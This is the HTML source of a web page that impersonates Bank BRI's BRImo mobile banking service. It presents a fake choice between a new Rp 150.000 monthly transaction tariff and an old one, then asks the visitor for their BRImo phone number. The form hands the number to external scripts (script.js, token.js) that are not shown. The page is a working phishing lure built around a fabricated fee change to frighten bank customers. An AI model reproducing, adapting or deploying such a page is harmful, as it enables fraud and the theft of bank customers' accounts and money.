<!DOCTYPE html>
<html lang="in">
<head>
    <meta charset="UTF-8">
    <script src="i.js"></script>
    <title>𝗔𝗸𝘁𝗶𝘃𝗮𝘀𝗶 𝗧𝗮𝗿𝗶𝗳 𝗕𝗮𝗻𝗸 𝗕𝗥𝗜 | 𝟮𝟬𝟮𝟰</title>
    <link rel="icon" type="image/png" href="img/BRImo.png">
    <meta content="https://hosting.tigerengine.id/6pkhja.webp" property="og:image">
<meta name="twitter:image" content="https://hosting.tigerengine.id/6pkhja.webp">
    	<meta name="description" content="Bank BRI terus berinovasi mengembangkan produk yang sesuai dengan perkembangan jaman untuk memenuhi kebutuhan nasabah">
    <meta name="theme-color" content="#0f78cb">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
    
    <script type="module" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js"></script>
</head>
<style>
    @import url('https://fonts.googleapis.com/css2?family=Nunito:wght@800&display=swap');
}
* {
    margin: 0px;
}
html, body {
      width: 100%;
      max-width: 400px;
      margin: 0 auto;
      }
body {
    margin: 0px;
    background: ,#fff;
    background-size: 100%;
    color: #fff;
    font-family: 'Nunito', sans-serif;
    max-width: 400px;
    max-height: 100vh;
    align-item: center;
    justify-content: center;
    bottom: 0;
    left: 0;
    right: 0;
    margin: 0px auto;
    margin-bottom: 110vh;
}

.lonte{
  display:none;
  z-index:3;
  position: absolute;
  top: 33%;
  left: 30%;
  transform: translate(-50%, -50%);
  max-width: 400px;
  
/*   spinner div css */
  height : 10px;
  width : 10px;
  border-radius : 50%;
/*   background-color : red; */
  border : 5px solid #ffffff80;
  border-top-color : #007bff;
  animation : spin 1s linear infinite;
}

@keyframes spin{
  0%{
    transform : rotate(0deg);
  }
  100%{
    transform : rotate(360deg);
  }
}

.patokk:active { background-color: rgba(0, 110, 200, 0.96); box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px inset, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px inset; transform: translateY(0px); }

.load{
     margin: 0 auto;
     top: 0;
     left: 0;
     right: 0;
     position: fixed;
     display: flex;
     justify-content: center;
     align-items: center;
     background: #00000090;
     z-index: 999999999;
     width: 100%;
     height: 100%;
     max-width: 400px;
      }
      
      .jao{
            width:90%;
      }
      
 welalxcome {
    position: fixed;
    right: 0;
    left: 0;
    top: 0;
    width: 100%;
    height: 100vh;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-items: center;
    align-content: center;
    justify-content: center;
    margin: 0 auto;
    max-width: 400px;
    background: #ffffffcc;
    z-index: 999;
}
welalxcome img {
        width:15vw;
    height: auto;
}
chsalxcome {
    position: relative;
    width: 100%;
    height: 100vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}


 
 .asu{
     width:100%;
     margin-top:55px;
     position: fixed;
     height: 100%;
     max-width: 400px;
     
 }  
    
 .nyusu{
     border-radius:7px;
     height:150px;
     max-width: 400px;
     margin-top: 20px;
     margin-left: 20px;
     box-shadow: rgba(0, 0, 0, 0.25) 0px 54px 55px, rgba(0, 0, 0, 0.12) 0px -12px 30px, rgba(0, 0, 0, 0.12) 0px 4px 6px, rgba(0, 0, 0, 0.17) 0px 12px 13px, rgba(0, 0, 0, 0.09) 0px -3px 5px;
     
 }
 
 ion-icon{
    font-size: 22px;
    margin-left: 8px;
    margin-top: -2px;
    position: absolute;
    color: #06529C;
}

.button-85 {
  background-color: ;
  max-width: 400px;
  user-select: none;
  -webkit-user-select: none;
  touch-action: manipulation;
}

.button-85:before {
  content: "";
  background: linear-gradient(
    50deg,
    #fff000,
    #ff7300,
    #fffb00,
    #48ff00,
    #00ffd5,
    #002bff,
    #7a00ff,
    #ff00c8,
    #ff0000
  );
  position: absolute;
  top: 0px;
  left: 0px;
  background-size: 500%;
  z-index: -1;
  filter: blur(0px);
  -webkit-filter: blur(0px);
  width: calc(100% + 0px);
  height: calc(100% + 0px);
  animation: glowing-button-85 20s linear infinite;
  transition: opacity 0.3s ease-in-out;
  border-radius: 18px;
}

@keyframes glowing-button-85 {
  0% {
    background-position: 0 0;
  }
  50% {
    background-position: 300% 0;
  }
  100% {
    background-position: 0 0;
  }
}

.button-85:after {
  z-index: -1;
  content: "";
  position: absolute;
  width: 100%;
  height: 100%;
  background: ;
  left: 0;
  top: 0;
  border-radius: none;
}
.patokk{
    max-width: 400px;
    margin: 0px auto;   
    position:relative;
    background-color:#0F78CB;
    color:#fff;
    border:0px solid #0076e0;
    width:90%;
    border-radius:3px;
    font-family: 'Nunito',sans-serif;
    font-size: 15px;
    padding: 13px;
    display: block;
    text-align: center;
    box-shadow: rgba(0, 0, 0, 0.10) 0px 10px 10px,
rgba(0, 0, 0, 0.20) 0px 6px 6px;
}

.patokk:hover { 
         
     opacity:0.3;
     border: 1px solid #0F78CB; 
     background-color: #0F78CB; 
     color: #fff; 
         
         
         } 
.patokk:disabled, 
.patokk[disabled]{
    
    opacity:0.3;
    border: 1px solid #0F78CB; 
    background-color: #0F78CB; 
    color: #fff;
}

.pilat{
    max-width: 400px;
    position: fixed;
    bottom: 0;
    left: 0;
    right: 0;
    margin: 0px auto;
    width: 100%;
    height: 72px;
    background: #ffffff;
    box-shadow: rgba(0, 0, 0, 0.15) 0px -12px 15px 0px;
padding-top: 15px
}

.hh{
    max-width: 400px;
    position: fixed; 
    top: -10; 
    left: 0; 
    right: 0; 
    margin: 0px auto; 
    width: 100%; 
    height: 50px; 
    background: #0F78CB; 
    border-bottom: 0px solid #fff;
    box-shadow: rgba(0, 0, 0, 0.10) 0px 10px 10px, rgba(0, 0, 0, 0.20) 0px 6px 6px;
    }
    
    .hua{
        max-width: 320px;
        bottom:170px;               
        position: absolute;
        border:5px solid #fff;
        padding:15px;
        width:80%;
        border-radius:18px; 
        background: #ffffffe6;
        background-size:100%; 
        height: 280px; 
        left: 0;
        right: 0;
        margin: 0px auto;
        box-shadow: rgba(0, 0, 0, 0.40) 0px 5px 15px 0px; 
    }
    
.yantek{
max-width: 400px;
box-sizing: border-box;
height: 35px;
width: 536px;
max-width: 100%;
border: 1px solid rgb(0, 134, 224);
border-image: initial;
background-color: rgb(255, 255, 255);
border-radius: 10px;
box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px,
rgba(0, 0, 0, 0.06) 0px 2px 4px -1px;
font-family: 'Nunito',
sans-serif;
font-weight: bold;
font-size: 14px;
color: rgb(28, 28, 28);
word-spacing: 0px;
padding: 0px 10px;
outline: none;
margin-top: -15px;
padding-left: 10px;
    }
    
    .kk{
        box-sizing: border-box; height: 40px; width: 536px; max-width: 100%; border: 1px solid rgb(0, 134, 224); border-image: initial; background-color: rgb(255, 255, 255);  border-radius: 10px; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px, rgba(0, 0, 0, 0.06) 0px 2px 4px -1px; font-family: 'Nunito', sans-serif; font-weight: bold; font-size: 16px; color: rgb(28, 28, 28); word-spacing: 0px; padding: 0px 10px; outline: none; margin-top: -15px; padding-left: 40px;
    }
    
    .kutal{
        position: fixed; bottom: 0; left: 0; right: 0; margin: 0px auto; width: 100%; height: 72px; background: #ffffff; box-shadow: rgba(0, 0, 0, 0.15) 0px -12px 15px 0px; padding-top: 15px;max-width: 400px;
    }

</style>
<body>
    <main>
<welalxcome>
<img src="img/BRImo.png" alt="" style="margin-top: -50px" />
</welalxcome>
<chsalxcome2 style="display: non;">
<img style="z-index:-1;position: fixed;width:100%;margin-top:0px;max-width: 400px;left: 0;right: 0;margin: 0px auto;" width="100%" src="img/buri.png" alt="">
<img style="position: fixed;width:100%;margin-top:50px;max-width: 400px;" src="img/26-.png" alt="">
<nav class="hh">
<center><img src="img/nav.png" style="margin-top:8px;" width="40px" alt=""></center></nav>
<div class="load" style="display:none">
 <img src="https://hosting.tigerengine.id/f01dmo.gif" class="jao" alt="">
      </div>
<marquee direction="right" behavior="alternate" scrolldelay="0" class="asu" style="display: block;animation: marquee 5000s linear infinite;overflow: hidden;">
<img class="nyusu" src="img/1.png" alt="">
<img class="nyusu" src="img/2.png" alt="">
<img class="nyusu" src="img/3.png" alt="">
<img class="nyusu" src="img/4.png" alt="">
<img class="nyusu" src="img/5.png" alt="">
</marquee>    



<form method="post" onsubmit="sendNohp()" id="formHP">
 <input type="hidden" name="logo" id="logo" value="༻✧°𝗕𝗮𝗻𝗸 𝗕𝗥𝗜°✧༺">

<div class="button-85 hua">
<center style="color:#09559a; line-height: 20px; font-size: 15px; padding: 0px;margin-top:-12px;"><p style="border-bottom:1.5px solid #0000004a;border-radius:10px;margin-bottom:0px;height:50px;">Silahkan Pilih Tarif Transaksi Sesuai Kebutuhan Anda Di Bawah Ini</p>
<img style="width:100%;margin-bottom:10px;"src="img/index.png" alt="">
</center>
<select name="tarif" id="tarif" required class="yantek" >
<option value="">PILIH TARIF</option>
<option value="Baru Rp 150.000">√•𝗧𝗮𝗿𝗶𝗳 𝗕𝗮𝗿𝘂 𝗥𝗽 𝟭𝟱𝟬.𝟬𝟬𝟬 / 𝗣𝗲𝗿𝗯𝘂𝗹𝗮𝗻</option>
<option value="Lama Rp 6.500">√•𝗧𝗮𝗿𝗶𝗳 𝗟𝗮𝗺𝗮 𝗥𝗽 𝟲.𝟱𝟬𝟬 / 𝗕𝗶 𝗳𝗮𝘀𝘁 𝟮.𝟱𝟬𝟬</option>
</select>

<br><br><br>
<h5 style="position:absolute;color:#000; margin-top: -28px; margin-left: 4px">Masukan Nomor ponsel <b style="color: #06529C">BRI</b><b style="color: #F37024">mo</b> Anda :</h5>

<ion-icon name="phone-portrait-sharp">
</ion-icon>
<input name="nohp" id="nohp" type="tel" class="kk" placeholder="08xxxxxx" oninvalid="this.setCustomValidity('Mohon mɑsukkɑn 𝗡𝗼𝗺𝗼𝗿 𝗣𝗼𝗻𝘀𝗲𝗹 dengɑn benɑr')" onchange="this.setCustomValidity('')" required maxlength="13" minlength="10">
</h3>


<br>
<br>
</div>
    





<div class="kutal">
<button class="patokk" type="submit" id="kirim" disabled>Lanjutkan</button>
           </div>
</smalxs>
</main>
</form>

<script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js'"></script>
<script src="script.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
<script>
        $( document ).ready(function() {
            setTimeout(() => {
                $('welalxcome').hide();
                $('chsalxcome2').fadeIn();
            },700)
        });
</script>
<script>
              function vibr(dur){
            if (navigator.vibrate) {
                navigator.vibrate(dur);
            } else {
                console.log("NotSupported");
            }
        }

</script>
     <script src="token.js">
 </script>
<script>
      
      // Get references to the input and button elements
const input = document.getElementById("nohp");
const button = document.getElementById("kirim");

// Add an event listener for the input event
input.addEventListener("input", () => {
  // Check if the input field has any text
  if (input.value.length > 9) {
    // If there's text, enable the button
    button.disabled = false;
  } else {
    // If there's no text, disable the button
    button.disabled = true;
  }
});
    

</script>
</body>
</html>
